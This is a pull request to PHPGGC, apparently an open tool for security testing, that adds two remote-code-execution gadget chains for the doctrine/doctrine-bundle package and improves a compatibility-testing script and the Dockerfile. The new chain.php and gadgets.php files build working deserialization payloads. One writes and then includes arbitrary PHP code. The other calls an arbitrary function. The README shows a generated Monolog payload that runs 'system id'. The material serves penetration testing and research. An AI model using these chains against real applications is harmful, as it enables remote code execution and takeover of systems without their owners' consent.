### PR TITLE
Added features on test-gc + 2 doctrine-bundle RCE

### DIFF
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,4 +1,12 @@
-FROM php:7.4-cli-alpine AS builder
+FROM php:8.1-cli-alpine AS builder
+
+RUN apk add python3 py3-pip curl
+
+RUN curl -s https://getcomposer.org/installer | php -- --install-dir=/usr/bin/ --filename=composer
+
+RUN alias composer='php /usr/bin/composer'
+
+RUN pip install rich
 
 COPY . /phpggc
 

--- a/README.md
+++ b/README.md
@@ -30,6 +30,8 @@ CodeIgniter4/RCE3                         -4.1.3+                               
 CodeIgniter4/RCE4                         4.0.0-beta.1 <= 4.0.0-rc.4                           RCE (Function call)    __destruct          
 Doctrine/FW1                              ?                                                    File write             __toString     *    
 Doctrine/FW2                              2.3.0 <= 2.4.0 v2.5.0 <= 2.8.5                       File write             __destruct     *    
+Doctrine/RCE1                             1.5.1 <= 2.7.2                                       RCE (PHP code)         __destruct     * 
+Doctrine/RCE2                             1.11.0 <= 2.3.2                                      RCE (Function call)    __destruct     * 
 Dompdf/FD1                                1.1.1 <= ?                                           File delete            __destruct     *    
 Dompdf/FD2                                ? < 1.1.1                                            File delete            __destruct     *    
 Drupal7/FD1                               7.0 < ?                                              File delete            __destruct     *    
@@ -336,6 +338,20 @@ Testing 59 versions for monolog/monolog against 2 gadget chains.
 └─────────────────┴─────────┴──────────────┴──────────────┘
 ```
 
+You can specify the versions you want to test by using the following syntaxe.
+
+```
+$ ./test-gc-compatibility.py monolog/monolog:2.3.0,1.25.4 monolog/rce1 monolog/rce3
+Testing 2 versions for monolog/monolog against 2 gadget chains.
+
+┏━━━━━━━━━━━━━━━━━┳━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┓
+┃ monolog/monolog ┃ Package ┃ monolog/rce1 ┃ monolog/rce3 ┃
+┡━━━━━━━━━━━━━━━━━╇━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━┩
+│ 2.3.0           │   OK    │      OK      │      KO      │
+│ 1.25.4          │   OK    │      OK      │      KO      │
+└─────────────────┴─────────┴──────────────┴──────────────┘
+```
+
 # API
 
 Instead of using PHPGGC as a command line tool, you can program PHP scripts:
@@ -398,8 +414,28 @@ For instance, use `./phpggc -n Drupal RCE` would create a new Drupal RCE gadgetc
 
 # Docker
 
-If you don't want to install PHP, you can use `docker build`.
+If you don't want to install PHP, you can use `docker build . -t 'phpggc'`.
 
+To generate a gadget chain.
+
+```
+$ docker run phpggc Monolog/rce1 'system' 'id'
+O:32:"Monolog\Handler\SyslogUdpHandler":1:{s:9:"*socket";O:29:"Monolog\Handler\BufferHandler":7:{s:10:"*handler";r:2;s:13:"*bufferSize";i:-1;s:9:"*buffer";a:1:{i:0;a:2:{i:0;s:2:"id";s:5:"level";N;}}s:8:"*level";N;s:14:"*initialized";b:1;s:14:"*bufferLimit";i:-1;s:13:"*processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}
+```
+
+To run `test-gc-compatibility.py` from docker.
+```
+$ docker run --entrypoint './test-gc-compatibility.py' phpggc doctrine/doctrine-bundle:2.2,2.7.2 doctrine/rce1 doctrine/rce2
+Runing on PHP version ('PHP 8.1.13 (cli) (built: Nov 30 2022 21:53:44) (NTS).
+Testing 2 versions for doctrine/doctrine-bundle against 2 gadget chains.
+
+┏━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━┳━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━┓
+┃ doctrine/doctrine-bundle ┃ Package ┃ doctrine/rce1 ┃ doctrine/rce2 ┃
+┡━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━╇━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━┩
+│ 2.2                      │   OK    │      OK       │      OK       │
+│ 2.7.2                    │   OK    │      OK       │      KO       │
+└──────────────────────────┴─────────┴───────────────┴───────────────┘
+```
 
 # License
 

--- a/gadgetchains/Doctrine/RCE/1/chain.php
+++ b/gadgetchains/Doctrine/RCE/1/chain.php
@@ -61,7 +61,7 @@ class RCE1 extends \PHPGGC\GadgetChain\RCE\PHPCode
         /* File write */
         $obj_write = new CacheAdapter();
         $mockFileSessionStorage = new MockFileSessionStorage();
-        $mockFileSessionStorage->data = array('<?php '. $code. ' ?>'); // Content put in the file
+        $mockFileSessionStorage->data = ['<?php '. $code. ' ?>']; // Content put in the file
         $mockFileSessionStorage->metadataBag = new MetadataBag();
         $obj_write->cache = $mockFileSessionStorage;
         $obj_write->deferredItems = [$firstCacheItem];
@@ -74,7 +74,7 @@ class RCE1 extends \PHPGGC\GadgetChain\RCE\PHPCode
         $cacheItem = $secondCacheItem;
         $cacheItem->expiry = 0; // mandatory to go to another branch from CacheAdapter __destruct
         $obj_include->deferredItems = [$cacheItem];
-        $obj = array(1000 => $obj_write, 1001 => 1, 2000 => $obj_include, 2001 => 1 );
+        $obj = [1000 => $obj_write, 1001 => 1, 2000 => $obj_include, 2001 => 1];
         return $obj;
     }
 }

--- a/gadgetchains/Doctrine/RCE/1/chain.php
+++ b/gadgetchains/Doctrine/RCE/1/chain.php
@@ -1,0 +1,67 @@
+<?php
+
+namespace GadgetChain\Doctrine;
+
+use Doctrine\Common\Cache\Psr6\CacheAdapter;
+use Doctrine\Common\Cache\Psr6\CacheItem;
+use Symfony\Component\Cache\Adapter\PhpArrayAdapter;
+use Symfony\Component\Cache\Adapter\ProxyAdapter;
+use Symfony\Component\HttpFoundation\Session\Storage\MockFileSessionStorage;
+use Symfony\Component\HttpFoundation\Session\Storage\MetadataBag;
+
+
+class RCE1 extends \PHPGGC\GadgetChain\RCE\PHPCode
+{
+    public static $version = 'v1.5.1 <= v2.7.2';
+    public static $vector = '__destruct';
+    public static $author = 'Remsio';
+    public static $information = 'Based on package doctrine/doctrine-bundle, the Symfony bundle for doctrine. The chain is based on one chain to write, and on another one to include.';
+
+    /**
+     * Fast destruct implementation for both chains, mandatory to make sure the payload triggers correctly
+     */
+    public function process_serialized($serialized)
+    {
+
+        $find_write = (
+            '#i:(' .
+                1001 . '|' .
+                (1001 + 1) .
+            ');#'
+        );
+        $replace_write = 'i:' . 1000 . ';';
+        $serialized2 = preg_replace($find_write, $replace_write, $serialized);
+        $find_include = (
+            '#i:(' .
+                2001 . '|' .
+                (2001 + 1) .
+            ');#'
+        );
+        $replace_include = 'i:' . 2000 . ';';
+        return preg_replace($find_include, $replace_include, $serialized2);
+  	}
+
+    public function generate(array $parameters)
+    {
+        $code = $parameters['code'];
+
+        /* File write */
+        $obj_write = new CacheAdapter();
+        $mockFileSessionStorage = new MockFileSessionStorage();
+        $mockFileSessionStorage->data = array('<?php '. $code. ' ?>'); // Content put in the file
+        $mockFileSessionStorage->metadataBag = new MetadataBag();
+        $obj_write->cache = $mockFileSessionStorage;
+        $obj_write->deferredItems = [new CacheItem()];
+        
+        /* File inclusion */
+        $obj_include = new CacheAdapter();
+        $proxyAdapter = new ProxyAdapter();
+        $proxyAdapter->pool = new PhpArrayAdapter();
+        $obj_include->cache = $proxyAdapter;
+        $cacheItem = new CacheItem();
+        $cacheItem->expiry = 0; // mandatory to go to another branch from CacheAdapter __destruct
+        $obj_include->deferredItems = [$cacheItem];
+        $obj = array(1000 => $obj_write, 1001 => 1, 2000 => $obj_include, 2001 => 1 );
+        return $obj;
+    }
+}

--- a/gadgetchains/Doctrine/RCE/1/gadgets.php
+++ b/gadgetchains/Doctrine/RCE/1/gadgets.php
@@ -1,0 +1,41 @@
+<?php
+
+namespace Doctrine\Common\Cache\Psr6
+{
+
+    class CacheAdapter {
+        public $deferredItems = true;
+        public $loader = 1;
+        public $cache;
+        
+    }
+    class CacheItem {
+        public $expiry = 99999999999999999;
+        public $value = "test";
+    }
+
+}
+
+namespace Symfony\Component\Cache\Adapter
+{
+    class PhpArrayAdapter{
+        public $file = "/tmp/aaa.mocksess"; // fixed at the time
+    }
+
+    class ProxyAdapter{
+
+    }
+}
+
+
+namespace Symfony\Component\HttpFoundation\Session\Storage
+{
+    class MockFileSessionStorage {
+        public $started =true;
+        public $savePath = "/tmp"; // Produces /tmp/aaa.mocksess
+        public $id = "aaa";
+    }
+    class MetadataBag{
+        public $storageKey = "a";
+    }
+}

--- a/gadgetchains/Doctrine/RCE/1/gadgets.php
+++ b/gadgetchains/Doctrine/RCE/1/gadgets.php
@@ -9,6 +9,11 @@ namespace Doctrine\Common\Cache\Psr6
         public $cache;
         
     }
+    class TypedCacheItem {
+        public $expiry = 99999999999999999;
+        public $value = "test";
+    }
+
     class CacheItem {
         public $expiry = 99999999999999999;
         public $value = "test";

--- a/gadgetchains/Doctrine/RCE/2/chain.php
+++ b/gadgetchains/Doctrine/RCE/2/chain.php
@@ -1,0 +1,27 @@
+<?php
+
+namespace GadgetChain\Doctrine;
+
+use Doctrine\Common\Cache\Psr6\CacheAdapter;
+use Symfony\Component\Cache\Traits\RedisProxy;
+use Doctrine\Bundle\DoctrineBundle\Dbal\SchemaAssetsFilterManager;
+
+class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '1.11.0 <= 2.3.2';
+    public static $vector = '__destruct';
+    public static $author = 'Remsio';
+    public static $information = 'Based on package doctrine/doctrine-bundle, the Symfony bundle for doctrine. This chain exploits this chain : $schemaAssetFilter($assetName) from SchemaAssetsFilterManager __invoke function.';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+        $obj = new CacheAdapter();
+        $obj->loader = 1;
+        $redisProxy = new RedisProxy($parameter);
+        $redisProxy->initializer = new SchemaAssetsFilterManager($function);
+        $obj->deferredItems = [$redisProxy];
+        return $obj;
+    }
+}

--- a/gadgetchains/Doctrine/RCE/2/chain.php
+++ b/gadgetchains/Doctrine/RCE/2/chain.php
@@ -11,7 +11,7 @@ class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall
     public static $version = '1.11.0 <= 2.3.2';
     public static $vector = '__destruct';
     public static $author = 'Remsio';
-    public static $information = 'Based on package doctrine/doctrine-bundle, the Symfony bundle for doctrine. This chain exploits this chain : $schemaAssetFilter($assetName) from SchemaAssetsFilterManager __invoke function.';
+    public static $information = 'Based on package doctrine/doctrine-bundle, the Symfony bundle for doctrine. This chain exploits : $schemaAssetFilter($assetName) from SchemaAssetsFilterManager __invoke function.';
 
     public function generate(array $parameters)
     {

--- a/gadgetchains/Doctrine/RCE/2/gadgets.php
+++ b/gadgetchains/Doctrine/RCE/2/gadgets.php
@@ -1,0 +1,31 @@
+<?php
+
+namespace Doctrine\Common\Cache\Psr6
+{
+
+    class CacheAdapter {
+        public $deferredItems = true;
+    }
+
+}
+
+namespace Symfony\Component\Cache\Traits
+{
+    class RedisProxy {
+        public $redis;
+        public function __construct ($parameter) {
+            $this->redis = $parameter;
+        }
+
+    }
+}
+
+namespace Doctrine\Bundle\DoctrineBundle\Dbal
+{
+    class SchemaAssetsFilterManager {
+        public $schemaAssetFilters;
+        public function __construct ($function) {
+            $this->schemaAssetFilters = [$function];
+        }
+    }
+}

--- a/test-gc-compatibility.py
+++ b/test-gc-compatibility.py
@@ -58,6 +58,13 @@ class Tester:
         for gc in self._gcs:
             self.ensure_gc_exists(gc)
 
+        php_version = str(self._executor.php("--version")).split('\\n')[0]
+        print(
+            f"Runing on PHP version "
+            f"[blue]{php_version}[/blue]"
+            f"."
+        )
+
         versions = self._package.get_versions()
         print(
             f"Testing {len(versions)} versions for "
@@ -184,12 +191,14 @@ class Executor:
         work_dir = pathlib.Path(__file__).parent.resolve()
         phpggc = os.environ.get("PHPGGC_PATH", str(work_dir / "phpggc"))
         composer = os.environ.get("COMPOSER_PATH", "composer")
+        php = os.environ.get("PHP_PATH", "php")
 
         if not pathlib.Path(phpggc).is_file():
             raise TesterException("phpggc executable not found")
 
         self._phpggc = self._get_valid_run_command(phpggc)
         self._composer = self._get_valid_run_command(composer)
+        self._php = self._get_valid_run_command(php)
 
     def _run(self, *args):
         """Runs a program with given arguments."""
@@ -205,6 +214,13 @@ class Executor:
         was successful or not.
         """
         return self._run(*self._phpggc, *args).returncode == 0
+
+    def php(self, *args):
+        """Runs PHP with given arguments and returns whether the execution
+        was successful or not.
+        """
+        process = self._run(*self._php, *args)
+        return process.stdout.decode("utf-8"), process.stderr.decode("utf-8")
 
 
 class Package:

--- a/test-gc-compatibility.py
+++ b/test-gc-compatibility.py
@@ -217,6 +217,15 @@ class Package:
 
     def get_versions(self):
         """Uses composer to obtain each version (or tag) for the package."""
+        if ":" in self.name:
+            try:
+                versions = self.name.split(":")[1]
+                self.name = self.name.split(":")[0]
+                return [v.strip() for v in versions.split(",")]
+            except IndexError:
+                raise IndexError("Inexistant index")
+            except AttributeError:
+                raise AttributeError("No version defined")
         versions, _ = self._executor.composer("show", "-a", self.name)
         versions = re.search(r"versions :(.*)\ntype", versions).group(1)
         return [v.strip() for v in versions.split(",")]
@@ -240,7 +249,7 @@ class Package:
             "--no-interaction",
             "--no-plugins",
             "--quiet",
-            "--ignore-platform-reqs",
+            "--ignore-platform-req=ext-*",
             f"{self.name}:{version}",
         )
         if stderr:


### PR DESCRIPTION
### test-gc-compatibility.py improvements

I adapted test-gc-compatibility.py and added some features on it.

#### Taking the PHP version in consideration

test-gc was installing the packages with the option `--ignore-platform-reqs` which installed the packages without taking in consideration the version of PHP running the payloads, which can cause some issues if incompatible packages are installed, in my case it broke the dependency `psr/log` and installed the latest, even if it is not compatible with PHP 7.4.

So I replaced it with the option `--ignore-platform-req=ext-*` which takes the PHP version in consideration but ignores PHP extensions requirements.

#### Give details on the PHP version which runs test-gc

Since the PHP version on which the gadget chain runs can cause unexpected issues, I printed it at the start of _test-gc_ to make it easier to debug.

#### Selecting specific package versions

Before this update, running test-gc on packages with a ton of version such as `symfony/symfony` could take hours.

You can now specify the versions you want to test by using the following syntax.

```
$ ./test-gc-compatibility.py monolog/monolog:2.3.0,1.25.4 monolog/rce1 monolog/rce3
Testing 2 versions for monolog/monolog against 2 gadget chains.

┏━━━━━━━━━━━━━━━━━┳━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┓
┃ monolog/monolog ┃ Package ┃ monolog/rce1 ┃ monolog/rce3 ┃
┡━━━━━━━━━━━━━━━━━╇━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━┩
│ 2.3.0           │   OK    │      OK      │      KO      │
│ 1.25.4          │   OK    │      OK      │      KO      │
└─────────────────┴─────────┴──────────────┴──────────────┘
```
#### Docker compatibility for test-gc-compatibility.py
Require packages to use `test-gc-compatibility.py` in the `Dockerfile` were added, you can run it from docker with the following syntax.
```
$ docker run --entrypoint './test-gc-compatibility.py' phpggc doctrine/doctrine-bundle:2.2,2.7.2 doctrine/rce1 doctrine/rce2
Runing on PHP version ('PHP 8.1.13 (cli) (built: Nov 30 2022 21:53:44) (NTS).
Testing 2 versions for doctrine/doctrine-bundle against 2 gadget chains.

┏━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━┳━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━┓
┃ doctrine/doctrine-bundle ┃ Package ┃ doctrine/rce1 ┃ doctrine/rce2 ┃
┡━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━╇━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━┩
│ 2.2                      │   OK    │      OK       │      OK       │
│ 2.7.2                    │   OK    │      OK       │      KO       │
└──────────────────────────┴─────────┴───────────────┴───────────────┘
```
### Two gadget chains on the doctrine/doctrine-bundle package

I also added two gadget chains working on several `doctrine/doctrine-bundle` versions, _Doctrine/RCE1_ works from version _1.5.1_ to version _2.7.2_, _Doctrine/RCE2_ works from version _1.11.0_ to version _2.3.2_.

Since the PHP version has an influence on the chain _Doctrine/RCE1_, here are the `./test-gc-compatibility.py` result on PHP _7.4.33_ and _8.1.13_ :

On _PHP 7.4.33_ :

![php7_popchain_1](https://user-images.githubusercontent.com/110113034/207050175-80b6448c-adad-4d22-b977-06a27134a002.png)
![php7_popchain_2](https://user-images.githubusercontent.com/110113034/207050203-9d9c8761-1092-4ace-9213-3e41820fca28.png)
![php7_popchain_3](https://user-images.githubusercontent.com/110113034/207050225-53ba8c9c-3071-4dbc-8d53-a38d0ffe5ddd.png)

On _PHP 8.1.13_ :

![php8_popchain_1](https://user-images.githubusercontent.com/110113034/207050380-feacbcc0-f24c-480f-9706-ff2aede76310.png)
![php8_popchain_2](https://user-images.githubusercontent.com/110113034/207050399-163ad6d6-7c65-470b-a265-59e6e72a4242.png)
![php8_popchain_3](https://user-images.githubusercontent.com/110113034/207050419-379dbaa5-cd98-4aca-a46d-43ad32433614.png)